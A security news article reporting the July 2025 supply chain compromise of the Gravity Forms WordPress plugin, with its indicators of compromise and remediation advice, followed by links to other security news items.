The popular WordPress plugin Gravity Forms suffered from a supply chain attack. As a result, installers from the official website were infected with a backdoor.
Gravity Forms is a premium plugin for creating contact, payment, and other online forms. According to official statistics, it is installed on approximately one million sites, some of which belong to well-known organizations such as Airbnb, Nike, ESPN, Unicef, and Google.
Experts from PatchStack warn that they have received reports of suspicious requests being generated by plugins downloaded from the official Gravity Forms website.
Upon examining the plugin, researchers confirmed that a malicious file (gravityforms/common.php) is indeed being downloaded from the manufacturer’s website. Closer inspection revealed that this file initiates a POST request to a suspicious domain at gravityapi[.]org/sites.
Further analysis revealed that the plugin collects a wealth of metadata from sites, including the URL, path to the admin panel, as well as data about themes, plugins, and PHP/WordPress versions. All the collected data is transmitted to the attackers.
The server’s response from the hackers contains malicious PHP code encoded in base64, which is saved as wp-includes/bookmark-canonical.php. This malware disguises itself as WordPress Content Management Tools and allows remote code execution without the need for authentication by utilizing functions such as handle_posts(), handle_media(), handle_widgets().
RocketGenius, the company developing Gravity Forms, was notified of the issue, after which a representative informed researchers that the malware had infiltrated only the plugin versions installed manually and through Composer.
Experts recommend that anyone who downloaded Gravity Forms on July 10-11, 2025, reinstall the plugin by obtaining a clean version. Additionally, administrators need to check their sites for signs of infection.
The representatives from RocketGenius have already published an incident analysis, confirming that only versions 2.9.11.1 and 2.9.12 of Gravity Forms, available for manual download from July 10 to July 11, 2025, were compromised. It is also noted that if users installed version 2.9.11 via Composer on any of the mentioned dates, they also received an infected copy of the plugin.
“The Gravity API service, which handles licensing, automatic updates, and the installation of add-ons initiated by Gravity Forms, has not been compromised. The attack did not affect the package updates managed by this service,” the developers stated.
According to the developer, the malicious code blocked update attempts, connected to an external server to receive additional payloads, and added an administrator account to the site, giving attackers full control over the compromised resource.
2025.04.16 — Android devices will restart every three days to protect user data
Google introduces a new security feature for Android devices: locked and unused devices will be automatically restarted after three days of inactivity to return their memory to an…
Full article →
2025.03.05 — Polish Space Agency disconnects its network due to hacker attack
Last weekend, the Polish Space Agency (POLSA) had to disconnect all of its systems from the Internet to localize an attack targeting its IT infrastructure. After discovering the intrusion,…
Full article →
2025.04.08 — Website of Everest ransomware group hacked and defaced
Last weekend, the darknet website of the Everest ransomware group was hacked and went offline. The attackers replaced its content with a sarcastic message: "Don't do crime…
Full article →
2025.04.07 — Critical RCE vulnerability discovered in Apache Parquet
All versions of Apache Parquet up to and including 1.15.0 are affected by a critical remote code execution (RCE) vulnerability whose CVSS score is 10 out…
Full article →
2025.04.29 — FBI Offers 10 million USD for information on Salt Typhoon members
The FBI offers up to 10 million USD for information about members of the Chinese hacker group Salt Typhoon and last year's attack that had…
Full article →
2025.04.04 — Privilege escalation vulnerability in Google Cloud resulting in sensitive data leaks finally patched
Tenable Research revealed details of a recently patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run enabling an attacker to gain access to container images…
Full article →
2025.04.10 — April updates released by Microsoft cause issues with Windows Hello
Microsoft warns that some Windows users who have installed the April updates might be unable to login to their Windows services using Windows Hello facial recognition…
Full article →
2025.02.07 — 768 vulnerabilities were exploited by hackers in 2024
According to VulnCheck, 768 CVEs were registered as exploited in real-life attacks in 2024. This is 20% greater compared to 2023 when hackers exploited 639 vulnerabilities. Interestingly,…
Full article →
2025.02.23 — New JavaScript obfuscation technique uses invisible Unicode characters
According to Juniper Threat Labs , a new JavaScript obfuscation technique that uses invisible Unicode characters was used in a phishing attack targeting Political Action…
Full article →
2025.01.30 — Hackers use vulnerabilities in SimpleHelp RMM to attack corporate networks
Experts believe that recently patched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) were used by attackers to gain initial access to corporate networks. A number…
Full article →